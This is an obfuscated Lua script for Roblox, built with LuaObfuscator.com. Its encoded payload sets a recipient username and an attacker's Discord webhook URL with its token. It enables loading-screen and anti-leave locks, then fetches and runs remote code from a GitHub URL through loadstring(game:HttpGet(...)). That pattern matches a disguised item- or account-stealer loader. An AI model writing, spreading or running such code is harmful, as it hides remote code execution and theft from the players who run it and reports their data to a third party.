--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.14) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v81=v2(v0(v30,16));if v19 then local v87=0;local v88;while true do if (v87==1) then return v88;end if (v87==0) then v88=v5(v81,v19);v19=nil;v87=1;end end else return v81;end end end);local function v20(v31,v32,v33)if v33 then local v82=(v31/((5 -3)^(v32-(2 -1))))%(2^(((v33-(1 -0)) -(v32-(2 -(1638 -(1523 + 114))))) + (620 -(555 + 64)))) ;return v82-(v82%(932 -(857 + (951 -(282 + 595))))) ;else local v83=(570 -(367 + 201))^(v32-((834 + 94) -(214 + 713))) ;return (((v31%(v83 + v83))>=v83) and (1 + 0)) or (0 + 0) ;end end local function v21()local v34=(0 -0) -0 ;local v35;while true do if (v34==1) then return v35;end if (v34==(1065 -(68 + 997))) then v35=v1(v16,v18,v18);v18=v18 + (1271 -(226 + 1044)) ;v34=1;end end end local function v22()local v36,v37=v1(v16,v18,v18 + (119 -(32 + 85)) );v18=v18 + 2 + 0 ;return (v37 * 256) + v36 ;end local function v23()local v38,v39,v40,v41=v1(v16,v18,v18 + (351 -(87 + 263)) + 2 );v18=v18 + (961 -((1072 -(67 + 113)) + 65)) ;return (v41 * (40022563 -23245347)) + (v40 * (121138 -55602)) + (v39 * (469 -213)) + v38 ;end local function v24()local v42=0 + 0 ;local v43;local v44;local v45;local v46;local v47;local v48;while true do if (v42==(7 -4)) then if (v47==0) then if (v46==(0 + 0)) then return v48 * 0 ;else v47=3 -2 ;v45=952 -(802 + 150) ;end elseif (v47==((9751 -4240) -3464)) then return ((v46==(0 -0)) and (v48 * ((1 + 0)/(997 -(915 + 82))))) or (v48 * NaN) ;end return v8(v48,v47-1023 ) * (v45 + (v46/(2^52))) ;end if (v42==(5 -(441 -(145 + 293)))) then v47=v20(v44,13 + 8 ,40 -9 );v48=((v20(v44,1219 -(1069 + 118) )==((432 -(44 + 386)) -1)) and  -((1487 -(998 + 488)) -(0 + 0))) or 1 ;v42=1 + 2 ;end if (v42==(1 -0)) then v45=1 + 0 + 0 ;v46=(v20(v44,792 -(368 + 423) ,62 -42 ) * ((20 -(10 + 8))^(122 -90))) + v43 ;v42=(1216 -(201 + 571)) -(416 + 26) ;end if (v42==(0 -(1138 -(116 + 1022)))) then v43=v23();v44=v23();v42=(4 -3) + 0 + 0 ;end end end local function v25(v49)local v50=(1423 -(630 + 793)) -0 ;local v51;local v52;while true do if (v50==(7 -5)) then v52={};for v89=1, #v51 do v52[v89]=v2(v1(v3(v51,v89,v89)));end v50=862 -(814 + 45) ;end if ((2 -1)==v50) then v51=v3(v16,v18,(v18 + v49) -((3 -2) + 0) );v18=v18 + v49 ;v50=2;end if (v50==(0 + 0)) then v51=nil;if  not v49 then v49=v23();if (v49==(885 -(261 + 624))) then return "";end end v50=1 -0 ;end if (v50==(1083 -(1020 + 60))) then return v6(v52);end end end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v53=0;local v54;local v55;local v56;local v57;local v58;local v59;while true do local v66=0 -0 ;while true do if (v66~=(121 -(17 + 104))) then else if (v53==0) then local v95=0 -0 ;local v96;while true do if (v95==0) then v96=0 + 0 ;while true do if (v96~=(2 + 0)) then else v53=1 -0 ;break;end if (v96~=(983 -(18 + 964))) then else local v154=0;while true do if (v154==(0 -0)) then v56={};v57={v54,v55,nil,v56};v154=1;end if (v154~=(1 + 0)) then else v96=2;break;end end end if (v96~=(850 -(20 + 830))) then else local v155=0;while true do if (v155==(1 + 0)) then v96=1;break;end if ((126 -(116 + 10))~=v155) then else v54={};v55={};v155=1637 -(1373 + 263) ;end end end end break;end end end if (v53~=(1002 -(451 + 549))) then else for v99=739 -(542 + 196) ,v23() do local v100=0 + 0 ;local v101;local v102;local v103;while true do if (v100==(1 -0)) then v103=nil;while true do if (v101==(0 -0)) then local v158=1384 -(746 + 638) ;while true do if (v158~=(0 + 0)) then else v102=0 + 0 ;v103=nil;v158=1 -0 ;end if (v158==1) then v101=1 + 0 ;break;end end end if (v101==(2 -1)) then while true do if (v102~=(0 -0)) then else v103=v21();if (v20(v103,1552 -(1126 + 425) ,342 -(218 + 123) )~=(1581 -(1535 + 46))) then else local v165=0;local v166;local v167;local v168;local v169;local v170;while true do if (v165~=(1 + 0)) then else v168=nil;v169=nil;v165=2;end if (v165~=0) then else v166=0;v167=nil;v165=406 -(118 + 287) ;end if (2==v165) then v170=nil;while true do if (v166==(3 -2)) then v169=nil;v170=nil;v166=2;end if (v166==2) then while true do if (v167~=(1 + 2)) then else if (v20(v169,3,563 -(306 + 254) )==1) then v170[1 + 3 ]=v59[v170[4]];end v54[v99]=v170;break;end if (v167~=2) then else local v176=0 -0 ;local v177;while true do if (v176~=0) then else v177=0;while true do if (v177~=(1468 -(899 + 568))) then else v167=2 + 1 ;break;end if (v177==0) then if (v20(v169,2 -1 ,604 -(268 + 335) )==(291 -(60 + 230))) then v170[1 + 1 ]=v59[v170[2]];end if (v20(v169,574 -(426 + 146) ,2)==(978 -(553 + 424))) then v170[1 + 2 ]=v59[v170[3 + 0 ]];end v177=1;end end break;end end end if (v167==(0 + 0)) then local v178=0;local v179;while true do if ((1456 -(282 + 1174))~=v178) then else v179=811 -(569 + 242) ;while true do if (v179==1) then v167=2 -1 ;break;end if (v179==(0 + 0)) then v168=v20(v103,1026 -(706 + 318) ,1254 -(721 + 530) );v169=v20(v103,8 -4 ,1277 -(945 + 326) );v179=2 -1 ;end end break;end end end if (1==v167) then v170={v22(),v22(),nil,nil};if (v168==0) then local v182=700 -(271 + 429) ;local v183;local v184;while true do if (v182~=(0 + 0)) then else v183=0 + 0 ;v184=nil;v182=1501 -(1408 + 92) ;end if (v182==(1087 -(461 + 625))) then while true do if (v183==(0 -0)) then v184=1202 -(373 + 829) ;while true do if ((1288 -(993 + 295))~=v184) then else v170[1 + 2 ]=v22();v170[3 + 1 ]=v22();break;end end break;end end break;end end elseif (v168==(1172 -(418 + 753))) then v170[2 + 1 ]=v23();elseif (v168==(2 -0)) then v170[1 + 2 ]=v23() -((1 + 1)^(3 + 13)) ;elseif (v168~=(3 -0)) then else local v191=0 + 0 ;while true do if ((529 -(406 + 123))==v191) then v170[1772 -(1749 + 20) ]=v23() -((1 + 1)^(1338 -(1249 + 73))) ;v170[4]=v22();break;end end end v167=2;end end break;end if (v166~=0) then else local v174=0 + 0 ;while true do if (v174~=(1145 -(466 + 679))) then else v167=0;v168=nil;v174=2 -1 ;end if ((2 -1)==v174) then v166=1505 -(363 + 1141) ;break;end end end end break;end end end break;end end break;end end break;end if (v100==(1900 -(106 + 1794))) then v101=0;v102=nil;v100=1 + 0 ;end end end for v104=1 + 0 ,v23() do v55[v104-(2 -1) ]=v28();end return v57;end v66=2 -1 ;end if (v66==(115 -(4 + 110))) then if (v53==(585 -(57 + 527))) then local v97=0;local v98;while true do if (v97==(1427 -(41 + 1386))) then v98=103 -(17 + 86) ;while true do if ((1 + 0)==v98) then local v156=0 + 0 ;while true do if (v156==(0 -0)) then for v160=2 -1 ,v58 do local v161=1933 -(565 + 1368) ;local v162;local v163;local v164;while true do if (v161~=0) then else local v171=0;while true do if (v171~=(0 -0)) then else v162=0 -0 ;v163=nil;v171=1;end if (v171~=(167 -(122 + 44))) then else v161=1 -0 ;break;end end end if ((3 -2)~=v161) then else v164=nil;while true do if (v162~=(1 + 0)) then else if (v163==1) then v164=v21()~=(856 -(564 + 292)) ;elseif (v163==(2 -0)) then v164=v24();elseif (v163~=(8 -5)) then else v164=v25();end v59[v160]=v164;break;end if (v162==(304 -(244 + 60))) then local v173=0;while true do if ((0 + 0)==v173) then v163=v21();v164=nil;v173=1;end if ((1 + 0)~=v173) then else v162=1 + 0 ;break;end end end end break;end end end v57[5 -2 ]=v21();v156=1;end if (v156~=1) then else v98=67 -(30 + 35) ;break;end end end if ((1127 -(936 + 189))==v98) then v53=2;break;end if (v98==(0 + 0)) then local v157=1613 -(1565 + 48) ;while true do if (v157~=(1257 -(1043 + 214))) then else v58=v23();v59={};v157=3 -2 ;end if (v157==1) then v98=1213 -(323 + 889) ;break;end end end end break;end end end break;end end end end local function v29(v60,v61,v62)local v63=v60[1];local v64=v60[2];local v65=v60[3];return function(...)local v67=v63;local v68=v64;local v69=v65;local v70=v27;local v71=1;local v72= -1;local v73={};local v74={...};local v75=v12("#",...) -1 ;local v76={};local v77={};for v84=0,v75 do if (v84>=v69) then v73[v84-v69 ]=v74[v84 + 1 ];else v77[v84]=v74[v84 + 1 ];end end local v78=(v75-v69) + 1 ;local v79;local v80;while true do v79=v67[v71];v80=v79[1];if (v80<=5) then if (v80<=2) then if (v80<=0) then v77[v79[2]]=v62[v79[3]];elseif (v80>1) then v77[v79[2]]=v79[3]~=0 ;else local v122=v79[2];v77[v122]=v77[v122](v13(v77,v122 + 1 ,v72));end elseif (v80<=3) then local v108=v79[2];local v109,v110=v70(v77[v108](v13(v77,v108 + 1 ,v79[3])));v72=(v110 + v108) -1 ;local v111=0;for v118=v108,v72 do v111=v111 + 1 ;v77[v118]=v109[v111];end elseif (v80>4) then v77[v79[2]]();else v77[v79[2]][v79[3]]=v79[4];end elseif (v80<=8) then if (v80<=6) then do return;end elseif (v80>7) then v62[v79[3]]=v77[v79[2]];else v77[v79[2]]=v79[3];end elseif (v80<=9) then v77[v79[2]]=v79[3];v71=v71 + 1 ;v79=v67[v71];v62[v79[3]]=v77[v79[2]];v71=v71 + 1 ;v79=v67[v71];v77[v79[2]]=v79[3];v71=v71 + 1 ;v79=v67[v71];v62[v79[3]]=v77[v79[2]];v71=v71 + 1 ;v79=v67[v71];v77[v79[2]]=v79[3];v71=v71 + 1 ;v79=v67[v71];v62[v79[3]]=v77[v79[2]];v71=v71 + 1 ;v79=v67[v71];v77[v79[2]]=v62[v79[3]];v71=v71 + 1 ;v79=v67[v71];v77[v79[2]][v79[3]]=v79[4];v71=v71 + 1 ;v79=v67[v71];v77[v79[2]]=v62[v79[3]];v71=v71 + 1 ;v79=v67[v71];v77[v79[2]][v79[3]]=v79[4];elseif (v80>10) then local v130;local v131,v132;local v133;local v134;v77[v79[2]][v79[3]]=v79[4];v71=v71 + 1 ;v79=v67[v71];v77[v79[2]]=v62[v79[3]];v71=v71 + 1 ;v79=v67[v71];v77[v79[2]]=v62[v79[3]];v71=v71 + 1 ;v79=v67[v71];v134=v79[2];v133=v77[v79[3]];v77[v134 + 1 ]=v133;v77[v134]=v133[v79[4]];v71=v71 + 1 ;v79=v67[v71];v77[v79[2]]=v79[3];v71=v71 + 1 ;v79=v67[v71];v77[v79[2]]=v79[3]~=0 ;v71=v71 + 1 ;v79=v67[v71];v134=v79[2];v131,v132=v70(v77[v134](v13(v77,v134 + 1 ,v79[3])));v72=(v132 + v134) -1 ;v130=0;for v151=v134,v72 do v130=v130 + 1 ;v77[v151]=v131[v130];end v71=v71 + 1 ;v79=v67[v71];v134=v79[2];v77[v134]=v77[v134](v13(v77,v134 + 1 ,v72));v71=v71 + 1 ;v79=v67[v71];v77[v79[2]]();v71=v71 + 1 ;v79=v67[v71];do return;end else local v146=v79[2];local v147=v77[v79[3]];v77[v146 + 1 ]=v147;v77[v146]=v147[v79[4]];end v71=v71 + 1 ;end end;end return v29(v28(),{},v17)(...);end v15("LOL!0E3O0003083O00557365724E616D65030C3O0070686D692O742O656E732O6A03073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F2O313334373534393430393039322O373238342F496F514B50466B4D616F5F4944335779547A636177676942784E414A616C7579395861474641733164565133646D7647552D644B51356A4277524C484F442O4A5F4D6E6103093O00557365724E616D653203023O005F47030D3O004C6F6164696E675363722O656E2O0103093O00416E74694C6561766503093O004D6F7573654C6F636B030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403463O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C7970686572582F4D6F7269536372697074732F6D61696E2F4D6F72695363726970745A00153O0012093O00023O00124O00013O00124O00043O00124O00033O00124O00023O00124O00053O00124O00063O00304O0007000800124O00063O00304O0009000800124O00063O00300B3O000A000800124O000B3O00122O0001000C3O00202O00010001000D00122O0003000E6O000400016O000100049O0000026O000100016O00017O00",v9(),...);￼Enter
